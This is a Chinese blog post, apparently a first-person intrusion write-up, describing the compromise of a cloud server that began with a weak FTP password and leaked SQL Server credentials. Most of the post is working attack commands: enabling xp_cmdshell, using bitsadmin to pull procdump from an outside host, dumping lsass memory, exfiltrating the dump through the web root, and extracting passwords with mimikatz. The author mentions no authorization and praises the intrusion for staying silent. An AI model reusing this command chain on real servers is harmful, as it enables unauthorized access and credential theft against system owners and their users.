ftp引發(fā)的一次滲透實戰(zhàn)

前言

無意中遇到ftp弱口令,以為沒什么卵用。沒想到一個小細節(jié)導(dǎo)致服務(wù)器直接搞定。

信息收集

IP為阿里云118.19.xx.xx、開放大量端口21,22,80,81,1433,3389,8888等等

ftp弱口令

指紋識別發(fā)現(xiàn)81端口為serv-u軟件。一個弱口令ftp/ftp直接登錄。原以為ftp用來傳輸文件作用不大,沒想到無意中翻找到了web.config的敏感文件。

image.png

打開很明顯看到sql server的配置信息。


image.png

mssql命令執(zhí)行

開啟xp_cmdshell組件

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

直接執(zhí)行系統(tǒng)命令

exec master.dbo.xp_cmdshell  'whoami';
image.png

因為阿里云服務(wù)器的原因,想著直接激活guest用戶,結(jié)果在添加到管理員組的時候并沒有成功。查看進程,發(fā)現(xiàn)存在防護aliyundun.exe

image.png

那采用prodump導(dǎo)出lsass.dmp,然后從web下載到本地,再使用mimikatz讀取密碼。
此時有一個問題,web的絕對路徑還不知道。

web路徑查找

該IP的8888端口正常運行著web服務(wù),為一login.aspx登錄地址。
dir搜索logon.aspx

exec master.dbo.xp_cmdshell  'cd /d E: && dir /b /s Logon.aspx'
image.png

找到網(wǎng)站絕對路徑,就簡單啦~

dump hash

從公網(wǎng)上下載prodump.exe下載到靶機上。

exec master.dbo.xp_cmdshell  'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'
procdump.exe -accepteula -ma lsass.exe lsass.dmp

導(dǎo)出lsass.dmp

image.png

再copy lsass.dmp到網(wǎng)站根目錄下。需要重命名為txt后綴名。

exec master.dbo.xp_cmdshell  'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'

需要注意的是:
因為windows文件夾名稱中間沒有空格,如果文件夾名(或者目錄名)中有空格,就必須加雙引號了
訪問tmp.txt下載。然后本地的mimikatz讀取即可。

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
image.png

總結(jié)

不要放過任何一個細節(jié)。而且這次成功滲透,我發(fā)現(xiàn)全程以靜默化狀態(tài)運行,沒有掛馬,沒有惡意掃描。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。
禁止轉(zhuǎn)載,如需轉(zhuǎn)載請通過簡信或評論聯(lián)系作者。

相關(guān)閱讀更多精彩內(nèi)容

  • 信息收集 弱口令登錄失敗。網(wǎng)站使用帝國cms7.2 弱口令登錄失敗,使用帝國cms的通用漏洞,失敗。在知道絕對路徑...
    Tide_諾言閱讀 9,972評論 22 56
  • 運行操作 CMD命令:開始->運行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小沐子_IT閱讀 3,417評論 0 4
  • 命令簡介 cmd是command的縮寫.即命令行 。 雖然隨著計算機產(chǎn)業(yè)的發(fā)展,Windows 操作系統(tǒng)的應(yīng)用越來...
    Littleston閱讀 3,425評論 0 12
  • 運行操作 CMD命令:開始->運行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小明yz閱讀 2,996評論 0 8
  • 一套實用的滲透測試崗位面試題,你會嗎? 1.拿到一個待檢測的站,你覺得應(yīng)該先做什么? 收集信息 whois、網(wǎng)站源...
    g0閱讀 5,146評論 0 9

友情鏈接更多精彩內(nèi)容